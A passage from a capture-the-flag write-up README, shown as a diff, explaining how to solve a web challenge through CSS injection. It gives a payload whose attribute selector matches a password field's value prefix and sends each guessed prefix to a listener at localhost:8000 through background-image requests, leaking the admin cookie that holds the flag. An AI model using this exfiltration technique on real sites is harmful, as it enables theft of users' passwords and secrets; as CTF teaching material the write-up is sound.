csivitu/ctf-challenges/web/The Confused Deputy/README.md

 ...
 ```

 An so on, until you find the entire password.
+Pass these payloads to `/admin` and you can leak the admin cookie `password`, which is the flag.
 The final payload with the help of which you can find the entire flag is:

 ```css
 blue;} input[type="password"][value^="csictf{cssxss}"] {background-image: url('http://localhost:8000?csictf{cssxss}');